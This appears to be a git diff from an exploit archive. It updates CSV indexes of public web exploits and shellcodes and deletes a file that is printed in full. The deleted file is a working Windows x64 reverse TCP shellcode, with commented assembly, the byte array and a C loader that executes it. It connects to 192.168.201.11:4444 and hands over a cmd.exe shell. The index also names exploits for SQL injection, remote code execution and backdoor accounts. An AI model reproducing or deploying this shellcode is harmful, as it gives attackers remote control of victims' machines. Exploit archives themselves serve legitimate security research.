Upload Remote Code Execution",1970-01-01,"Audencia Business SCHOOL Red Team",webapps,multiple, 49436,exploits/hardware/webapps/49436.py,"Cisco UCS Manager 2.2(1d) - Remote Command Execution",1970-01-01,liquidsky,webapps,hardware, 49437,exploits/multiple/webapps/49437.txt,"Xwiki CMS 12.10.2 - Cross Site Scripting (XSS)",1970-01-01,"Karan Keswani",webapps,multiple, +50403,exploits/php/webapps/50403.txt,"Simple Payroll System 1.0 - SQLi Authentication Bypass",1970-01-01,"Yash Mahajan",webapps,php, 49448,exploits/php/webapps/49448.txt,"Apartment Visitors Management System 1.0 - 'email' SQL Injection",1970-01-01,"CANKAT ÇAKMAK",webapps,php, 49449,exploits/php/webapps/49449.txt,"Nagios XI 5.7.5 - Multiple Persistent Cross-Site Scripting",1970-01-01,"Matthew Aberegg",webapps,php, 49450,exploits/php/webapps/49450.rb,"Wordpress Plugin Simple Job Board 2.9.3 - Authenticated File Read (Metasploit)",1970-01-01,"SunCSR Team",webapps,php, @@ -44249,7 +44252,6 @@ id,file,description,date,author,type,platform,port 50242,exploits/php/webapps/50242.sh,"WordPress Plugin ProfilePress 3.1.3 - Privilege Escalation (Unauthenticated)",1970-01-01,"Numan Rajkotiya",webapps,php, 50243,exploits/java/webapps/50243.py,"Confluence Server 7.12.4 - 'OGNL injection' Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Fellipe Oliveira",webapps,java, 50246,exploits/php/webapps/50246.txt,"WordPress Plugin Payments Plugin | GetPaid 2.4.6 - HTML Injection",1970-01-01,"Niraj Mahajan",webapps,php, -50248,exploits/php/webapps/50248.txt,"Dolibarr ERP/CRM 14.0.1 - Privilege Escalation",1970-01-01,"Vishwaraj Bhattrai",webapps,php, 50249,exploits/php/webapps/50249.txt,"OpenSIS Community 8.0 - 'cp_id_miss_attn' SQL Injection",1970-01-01,"Eric Salario",webapps,php, 50251,exploits/hardware/webapps/50251.txt,"Compro Technology IP Camera - RTSP stream disclosure (Unauthenticated)",1970-01-01,icekam,webapps,hardware, 50252,exploits/hardware/webapps/50252.txt,"Compro Technology IP Camera - 'Multiple' Credential Disclosure",1970-01-01,icekam,webapps,hardware, @@ -44260,7 +44262,6 @@ id,file,description,date,author,type,platform,port 50260,exploits/php/webapps/50260.txt,"OpenEMR 6.0.0 - 'noteid' Insecure Direct Object Reference (IDOR)",1970-01-01,"Allen Enosh Upputori",webapps,php, 50262,exploits/php/webapps/50262.py,"FlatCore CMS 2.0.7 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Mason Soroka-Gill",webapps,php, 50263,exploits/php/webapps/50263.txt,"Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR)",1970-01-01,sudoninja,webapps,php, -50264,exploits/php/webapps/50264.py,"Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload & Remote Code Execution (RCE)",1970-01-01,a-rey,webapps,php, 50267,exploits/multiple/webapps/50267.txt,"Antminer Monitor 0.5.0 - Authentication Bypass",1970-01-01,Vulnz,webapps,multiple, 50268,exploits/php/webapps/50268.txt,"WordPress Plugin WP Sitemap Page 1.6.4 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Nikhil Kapoor",webapps,php, 50269,exploits/php/webapps/50269.py,"WordPress Plugin Survey & Poll 1.5.7.3 - 'sss_params' SQL Injection (2)",1970-01-01,"Mohin Paramasivam",webapps,php, @@ -44291,7 +44292,6 @@ id,file,description,date,author,type,platform,port 50304,exploits/php/webapps/50304.sh,"WordPress 5.7 - 'Media Library' XML External Entity Injection (XXE) (Authenticated)",1970-01-01,"David Utón",webapps,php, 50305,exploits/php/webapps/50305.py,"Online Food Ordering System 2.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Abdullah Khawaja",webapps,php, 50306,exploits/php/webapps/50306.py,"Church Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Abdullah Khawaja",webapps,php, -50308,exploits/php/webapps/50308.txt,"Budget and Expense Tracker System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Abdullah Khawaja",webapps,php, 50310,exploits/php/webapps/50310.py,"WebsiteBaker 2.13.0 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Halit AKAYDIN",webapps,php, 50315,exploits/php/webapps/50315.py,"e107 CMS 2.3.0 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Halit AKAYDIN",webapps,php, 50316,exploits/php/webapps/50316.py,"OpenCats 0.9.4-2 - 'docx ' XML External Entity Injection (XXE)",1970-01-01,"Jake Ruston",webapps,php, @@ -44303,7 +44303,6 @@ id,file,description,date,author,type,platform,port 50323,exploits/php/webapps/50323.html,"Backdrop CMS 1.20.0 - 'Multiple' Cross-Site Request Forgery (CSRF)",1970-01-01,V1n1v131r4,webapps,php, 50324,exploits/php/webapps/50324.txt,"WordPress Plugin Advanced Order Export For WooCommerce 3.1.7 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php, 50325,exploits/php/webapps/50325.html,"WordPress Plugin Fitness Calculators 1.9.5 - Cross-Site Request Forgery (CSRF)",1970-01-01,0xB9,webapps,php, -50326,exploits/php/webapps/50326.txt,"Budget and Expense Tracker System 1.0 - Arbitrary File Upload",1970-01-01,"()t/\\/\\1",webapps,php, 50327,exploits/php/webapps/50327.txt,"Police Crime Record Management Project 1.0 - Time Based SQLi",1970-01-01,"()t/\\/\\1",webapps,php, 50328,exploits/aspx/webapps/50328.txt,"SmarterTools SmarterTrack 7922 - 'Multiple' Information Disclosure",1970-01-01,"Andrei Manole",webapps,aspx, 50329,exploits/php/webapps/50329.txt,"Pharmacy Point of Sale System 1.0 - SQLi Authentication BYpass",1970-01-01,"Janik Wehrli",webapps,php, @@ -44311,8 +44310,6 @@ id,file,description,date,author,type,platform,port 50334,exploits/php/webapps/50334.txt,"Library System 1.0 - 'student_id' SQL injection (Authenticated)",1970-01-01,"Vinay Bhuria",webapps,php, 50339,exploits/hardware/webapps/50339.txt,"FatPipe Networks WARP 10.2.2 - Authorization Bypass",1970-01-01,LiquidWorm,webapps,hardware, 50340,exploits/hardware/webapps/50340.txt,"FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Config Download (Unauthenticated)",1970-01-01,LiquidWorm,webapps,hardware, -50341,exploits/hardware/webapps/50341.txt,"FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Hidden Backdoor Account (Write Access)",1970-01-01,LiquidWorm,webapps,hardware, -50342,exploits/hardware/webapps/50342.py,"FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - Remote Privilege Escalation",1970-01-01,LiquidWorm,webapps,hardware, 50343,exploits/php/webapps/50343.txt,"WordPress Plugin TranslatePress 2.0.8 - Stored Cross-Site Scripting (XSS) (Authenticated)",1970-01-01,"Nosa Shandy",webapps,php, 50344,exploits/php/webapps/50344.txt,"WordPress Plugin Contact Form 1.7.14 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php, 50345,exploits/php/webapps/50345.txt,"WordPress Plugin Ultimate Maps 1.2.4 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php, @@ -44356,3 +44353,12 @@ id,file,description,date,author,type,platform,port 50399,exploits/php/webapps/50399.txt,"Online Enrollment Management System 1.0 - Authentication Bypass",1970-01-01,"Amine ismail",webapps,php, 50400,exploits/php/webapps/50400.txt,"Online Employees Work From Home Attendance System 1.0 - SQLi Authentication Bypass",1970-01-01,"Merve Oral",webapps,php, 50402,exploits/php/webapps/50402.txt,"Loan Management System 1.0 - SQLi Authentication Bypass",1970-01-01,"Merve Oral",webapps,php, +50404,exploits/php/webapps/50404.txt,"Company's Recruitment Management System 1.0 - 'Multiple' SQL Injection (Unauthenticated)",1970-01-01,"Yash Mahajan",webapps,php, +50405,exploits/java/webapps/50405.py,"Keycloak 12.0.1 - 'request_uri ' Blind Server-Side Request Forgery (SSRF) (Unauthenticated)",1970-01-01,"Mayank Deshmukh",webapps,java, +50406,exploits/multiple/webapps/50406.sh,"Apache HTTP Server 2.4.50 - Path Traversal & Remote Code Execution (RCE)",1970-01-01,"Lucas Souza",webapps,multiple, +50409,exploits/php/webapps/50409.html,"Pharmacy Point of Sale System 1.0 - 'Add New User' Cross-Site Request Forgery (CSRF)",1970-01-01,"Murat DEMİRCİ",webapps,php, +50410,exploits/php/webapps/50410.txt,"Online Learning System 2.0 - 'Multiple' SQLi Authentication Bypass",1970-01-01,Blackhan,webapps,php, +50411,exploits/php/webapps/50411.txt,"Simple Issue Tracker System 1.0 - SQLi Authentication Bypass",1970-01-01,"Bekir Bugra TURKOGLU",webapps,php, +50412,exploits/php/webapps/50412.txt,"Student Quarterly Grading System 1.0 - 'grade' Stored Cross-Site Scripting (XSS)",1970-01-01,"Hüseyin Serkan Balkanli",webapps,php, +50413,exploits/multiple/webapps/50413.txt,"Logitech Media Server 8.2.0 - 'Title' Cross-Site Scripting (XSS)",1970-01-01,"Mert Daş",webapps,multiple, +50414,exploits/hardware/webapps/50414.txt,"Sonicwall SonicOS 7.0 - Host Header Injection",1970-01-01,Ramikan,webapps,hardware, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index 183fffa14..3dd8bb7f2 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -1025,4 +1025,3 @@ id,file,description,date,author,type,platform 48592,shellcodes/linux_x86/48592.c,"Linux/x86 - Disable ASLR Security + Polymorphic Shellcode (124 bytes)",1970-01-01,"Xenofon Vassilakopoulos",shellcode,linux_x86 48703,shellcodes/linux_x86/48703.c,"Linux/x86 - Egghunter (0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes)",1970-01-01,danf42,shellcode,linux_x86 48718,shellcodes/windows_x86/48718.c,"Windows/x86 - Download File (http://192.168.43.192:8080/9MKWaRO.hta) Via mshta Shellcode (100 bytes)",1970-01-01,"Siddharth Sharma",shellcode,windows_x86 -50291,shellcodes/windows_x86-64/50291.c,"Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes)",1970-01-01,"Xenofon Vassilakopoulos",shellcode,windows_x86-64 diff --git a/shellcodes/windows_x86-64/50291.c b/shellcodes/windows_x86-64/50291.c deleted file mode 100644 index 16f87a8c9..000000000 --- a/shellcodes/windows_x86-64/50291.c +++ /dev/null @@ -1,290 +0,0 @@ -# Title: Windows/x64 - Reverse TCP (192.168.201.11:4444) Shellcode (330 Bytes) -# Date: 09.12.2021 -# Author: Xenofon Vassilakopoulos -# Tested on: Windows/x64 - 10.0.19043 N/A Build 19043 - -/* - -MIT License - -Copyright (c) 2021 Xenofon Vassilakopoulos - -Permission is hereby granted, free of charge, to any person obtaining a copy -of this software and associated documentation files (the "Software"), to deal -in the Software without restriction, including without limitation the rights -to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -copies of the Software, and to permit persons to whom the Software is -furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all -copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -SOFTWARE. - - -[BITS 32] - -global _start - -section .text - -_start: - -; Locate Kernelbase.dll address -XOR ECX, ECX ;zero out ECX -MOV EAX, FS:[ecx + 0x30] ;EAX = PEB -MOV EAX, [EAX + 0x0c] ;EAX = PEB->Ldr -MOV ESI, [EAX + 0x14] ;ESI = PEB->Ldr.InMemoryOrderModuleList -LODSD ;memory address of the second list entry structure -XCHG EAX, ESI ;EAX = ESI , ESI = EAX -LODSD ;memory address of the third list entry structure -XCHG EAX, ESI ;EAX = ESI , ESI = EAX -LODSD ;memory address of the fourth list entry structure -MOV EBX, [EAX + 0x10] ;EBX = Base address - -; Export Table -MOV EDX, DWORD [EBX + 0x3C] ;EDX = DOS->e_lfanew -ADD EDX, EBX ;EDX = PE Header -MOV EDX, DWORD [EDX + 0x78] ;EDX = Offset export table -ADD EDX, EBX ;EDX = Export table -MOV ESI, DWORD [EDX + 0x20] ;ESI = Offset names table -ADD ESI, EBX ;ESI = Names table -XOR ECX, ECX ;EXC = 0 - -GetFunction : - -INC ECX; increment counter -LODSD ;Get name offset -ADD EAX, EBX ;Get function name -CMP dword [EAX], 0x50746547 ;"PteG" -JNZ SHORT GetFunction ;jump to GetFunction label if not "GetP" -CMP dword [EAX + 0x4], 0x41636F72 ;"rocA" -JNZ SHORT GetFunction ;jump to GetFunction label if not "rocA" -CMP dword [EAX + 0x8], 0x65726464 ;"ddre" -JNZ SHORT GetFunction ;jump to GetFunction label if not "ddre" - -MOV ESI, DWORD [EDX + 0x24] ;ESI = Offset ordinals -ADD ESI, EBX ;ESI = Ordinals table -MOV CX, WORD [ESI + ECX * 2] ;CX = Number of function -DEC ECX ;Decrement the ordinal -MOV ESI, DWORD [EDX + 0x1C] ;ESI = Offset address table -ADD ESI, EBX ;ESI = Address table -MOV EDX, DWORD [ESI + ECX * 4] ;EDX = Pointer(offset) -ADD EDX, EBX ;EDX = GetProcAddress - -; Get the Address of LoadLibraryA function -XOR ECX, ECX ;ECX = 0 -PUSH EBX ;Kernel32 base address -PUSH EDX ;GetProcAddress -PUSH ECX ;0 -PUSH 0x41797261 ;"Ayra" -PUSH 0x7262694C ;"rbiL" -PUSH 0x64616F4C ;"daoL" -PUSH ESP ;"LoadLibrary" -PUSH EBX ;Kernel32 base address -MOV ESI, EBX ;save the kernel32 address in esi for later -CALL EDX ;GetProcAddress(LoadLibraryA) - -ADD ESP, 0xC ;pop "LoadLibraryA" -POP EDX ;EDX = 0 -PUSH EAX ;EAX = LoadLibraryA -PUSH EDX ;ECX = 0 -MOV DX, 0x6C6C ;"ll" -PUSH EDX -PUSH 0x642E3233 ;"d.23" -PUSH 0x5F327377 ;"_2sw" -PUSH ESP ;"ws2_32.dll" -CALL EAX ;LoadLibrary("ws2_32.dll") - -ADD ESP, 0x10 ;Clean stack -MOV EDX, [ESP + 0x4] ;EDX = GetProcAddress -PUSH 0x61617075 ;"aapu" -SUB word [ESP + 0x2], 0x6161 ;"pu" (remove "aa") -PUSH 0x74726174 ;"trat" -PUSH 0x53415357 ;"SASW" -PUSH ESP ;"WSAStartup" -PUSH EAX ;ws2_32.dll address -MOV EDI, EAX ;save ws2_32.dll to use it later -CALL EDX ;GetProcAddress(WSAStartup) - -; Call WSAStartUp -XOR EBX, EBX ;zero out ebx register -MOV BX, 0x0190 ;EAX = sizeof(struct WSAData) -SUB ESP, EBX ;allocate space for the WSAData structure -PUSH ESP ;push a pointer to WSAData structure -PUSH EBX ;Push EBX as wVersionRequested -CALL EAX ;Call WSAStartUp - -;Find the address of WSASocketA -ADD ESP, 0x10 ;Align the stack -XOR EBX, EBX ;zero out the EBX register -ADD BL, 0x4 ;add 0x4 at the lower register BL -IMUL EBX, 0x64 ;EBX = 0x190 -MOV EDX, [ESP + EBX] ;EDX has the address of GetProcAddress -PUSH 0x61614174 ;"aaAt" -SUB word [ESP + 0x2], 0x6161 ;"At" (remove "aa") -PUSH 0x656b636f ;"ekco" -PUSH 0x53415357 ;"SASW" -PUSH ESP ;"WSASocketA", GetProcAddress 2nd argument -MOV EAX, EDI ;EAX now holds the ws2_32.dll address -PUSH EAX ;push the first argument of GetProcAddress -CALL EDX ;call GetProcAddress -PUSH EDI ;save the ws2_32.dll address to use it later - -;call WSASocketA -XOR ECX, ECX ;zero out ECX register -PUSH EDX ;null value for dwFlags argument -PUSH EDX ;zero value since we dont have an existing socket group -PUSH EDX ;null value for lpProtocolInfo -MOV DL, 0x6 ;IPPROTO_TCP -PUSH EDX ;set the protocol argument -INC ECX ;SOCK_STREAM(TCP) -PUSH ECX ;set the type argument -INC ECX ;AF_INET(IPv4) -PUSH ECX ;set the ddress family specification argument -CALL EAX ;call WSASocketA -XCHG EAX, ECX ;save the socket returned from WSASocketA at EAX to ECX in order to use it later - -;Find the address of connect -POP EDI ;load previously saved ws2_32.dll address to ECX -ADD ESP, 0x10 ;Align stack -XOR EBX, EBX ;zero out EBX -ADD BL, 0x4 ;add 0x4 to lower register BL -IMUL EBX, 0x63 ;EBX = 0x18c -MOV EDX, [ESP + EBX] ;EDX has the address of GetProcAddress -PUSH 0x61746365 ;"atce" -SUB word [ESP + 0x3], 0x61 ;"tce" (remove "a") -PUSH 0x6e6e6f63 ;"nnoc" -PUSH ESP ;"connect", second argument of GetProcAddress -PUSH EDI ;ws32_2.dll address, first argument of GetProcAddress -XCHG ECX, EBP -CALL EDX ;call GetProcAddress - -;call connect -PUSH 0x0bc9a8c0 ;sin_addr set to 192.168.201.11 -PUSH word 0x5c11 ;port = 4444 -XOR EBX, EBX ;zero out EBX -add BL, 0x2 ;TCP protocol -PUSH word BX ;push the protocol value on the stack -MOV EDX, ESP ;pointer to sockaddr structure (IP,Port,Protocol) -PUSH byte 16 ;the size of sockaddr - 3rd argument of connect -PUSH EDX ;push the sockaddr - 2nd argument of connect -PUSH EBP ;socket descriptor = 64 - 1st argument of connect -XCHG EBP, EDI -CALL EAX ;execute connect; - -;Find the address of CreateProcessA -ADD ESP, 0x14 ;Clean stack -XOR EBX, EBX ;zero out EBX -ADD BL, 0x4 ;add 0x4 to lower register BL -IMUL EBX, 0x62 ;EBX = 0x194 -MOV EDX, [ESP + EBX] ;EDX has the address of GetProcAddress -PUSH 0x61614173 ;"aaAs" -SUB dword [ESP + 0x2], 0x6161 ;"As" -PUSH 0x7365636f ;"seco" -PUSH 0x72506574 ;"rPet" -PUSH 0x61657243 ;"aerC" -PUSH ESP ;"CreateProcessA" - 2nd argument of GetProcAddress -MOV EBP, ESI ;move the kernel32.dll to EBP -PUSH EBP ;kernel32.dll address - 1st argument of GetProcAddress -CALL EDX ;execute GetProcAddress -PUSH EAX ;address of CreateProcessA -LEA EBP, [EAX] ;EBP now points to the address of CreateProcessA - -;call CreateProcessA -PUSH 0x61646d63 ;"admc" -SUB word [ESP + 0x3], 0x61 ;"dmc" ( remove a) -MOV ECX, ESP ;ecx now points to "cmd" string -XOR EDX, EDX ;zero out EDX -SUB ESP, 16 -MOV EBX, esp ;pointer for ProcessInfo - -;STARTUPINFOA struct -PUSH EDI ;hStdError => saved socket -PUSH EDI ;hStdOutput => saved socket -PUSH EDI ;hStdInput => saved socket -PUSH EDX ;lpReserved2 => NULL -PUSH EDX ;cbReserved2 => NULL -XOR EAX, EAX ;zero out EAX register -INC EAX ;EAX => 0x00000001 -ROL EAX, 8 ;EAX => 0x00000100 -PUSH EAX ;dwFlags => STARTF_USESTDHANDLES 0x00000100 -PUSH EDX ;dwFillAttribute => NULL -PUSH EDX ;dwYCountChars => NULL -PUSH EDX ;dwXCountChars => NULL -PUSH EDX ;dwYSize => NULL -PUSH EDX ;dwXSize => NULL -PUSH EDX ;dwY => NULL -PUSH EDX ;dwX => NULL -PUSH EDX ;pTitle => NULL -PUSH EDX ;pDesktop => NULL -PUSH EDX ;pReserved => NULL -XOR EAX, EAX ;zero out EAX -ADD AL, 44 ;cb => 0x44 (size of struct) -PUSH EAX ;eax points to STARTUPINFOA - -;ProcessInfo struct -MOV EAX, ESP ;pStartupInfo -PUSH EBX ;pProcessInfo -PUSH EAX ;pStartupInfo -PUSH EDX ;CurrentDirectory => NULL -PUSH EDX ;pEnvironment => NULL -PUSH EDX ;CreationFlags => 0 -XOR EAX, EAX ;zero out EAX register -INC EAX ;EAX => 0x00000001 -PUSH EAX ;InheritHandles => TRUE => 1 -PUSH EDX ;pThreadAttributes => NULL -PUSH EDX ;pProcessAttributes => NULL -PUSH ECX ;pCommandLine => pointer to "cmd" -PUSH EDX ;ApplicationName => NULL -CALL EBP ;execute CreateProcessA - -*/ - -#include -#include -#include - -char code[] = -"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x96\xad\x8b" -"\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31" -"\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f" -"\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x01\xde" -"\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x31\xc9\x53" -"\x52\x51\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54" -"\x53\x89\xde\xff\xd2\x83\xc4\x0c\x5a\x50\x52\x66\xba\x6c\x6c\x52\x68\x33" -"\x32\x2e\x64\x68\x77\x73\x32\x5f\x54\xff\xd0\x83\xc4\x10\x8b\x54\x24\x04" -"\x68\x75\x70\x61\x61\x66\x81\x6c\x24\x02\x61\x61\x68\x74\x61\x72\x74\x68" -"\x57\x53\x41\x53\x54\x50\x89\xc7\xff\xd2\x31\xdb\x66\xbb\x90\x01\x29\xdc" -"\x54\x53\xff\xd0\x83\xc4\x10\x31\xdb\x80\xc3\x04\x6b\xdb\x64\x8b\x14\x1c" -"\x68\x74\x41\x61\x61\x66\x81\x6c\x24\x02\x61\x61\x68\x6f\x63\x6b\x65\x68" -"\x57\x53\x41\x53\x54\x89\xf8\x50\xff\xd2\x57\x31\xc9\x52\x52\x52\xb2\x06" -"\x52\x41\x51\x41\x51\xff\xd0\x91\x5f\x83\xc4\x10\x31\xdb\x80\xc3\x04\x6b" -"\xdb\x63\x8b\x14\x1c\x68\x65\x63\x74\x61\x66\x83\x6c\x24\x03\x61\x68\x63" -"\x6f\x6e\x6e\x54\x57\x87\xcd\xff\xd2\x68\xc0\xa8\xc9\x0b\x66\x68\x11\x5c" -"\x31\xdb\x80\xc3\x02\x66\x53\x89\xe2\x6a\x10\x52\x55\x87\xef\xff\xd0\x83" -"\xc4\x14\x31\xdb\x80\xc3\x04\x6b\xdb\x62\x8b\x14\x1c\x68\x73\x41\x61\x61" -"\x81\x6c\x24\x02\x61\x61\x00\x00\x68\x6f\x63\x65\x73\x68\x74\x65\x50\x72" -"\x68\x43\x72\x65\x61\x54\x89\xf5\x55\xff\xd2\x50\x8d\x28\x68\x63\x6d\x64" -"\x61\x66\x83\x6c\x24\x03\x61\x89\xe1\x31\xd2\x83\xec\x10\x89\xe3\x57\x57" -"\x57\x52\x52\x31\xc0\x40\xc1\xc0\x08\x50\x52\x52\x52\x52\x52\x52\x52\x52" -"\x52\x52\x31\xc0\x04\x2c\x50\x89\xe0\x53\x50\x52\x52\x52\x31\xc0\x40\x50" -"\x52\x52\x51\x52\xff\xd5"; - -int main(int argc, char** argv) -{ - //HWND hWnd = GetConsoleWindow(); - //ShowWindow(hWnd, SW_HIDE); - printf("Shellcode Length: %d\n", strlen(code)); - void* exec = VirtualAlloc(0, strlen(code), MEM_COMMIT, PAGE_EXECUTE_READWRITE); - memcpy(exec, code, sizeof(code)); - ((void(*)())exec)(); - - return 0; -} \ No newline at end of file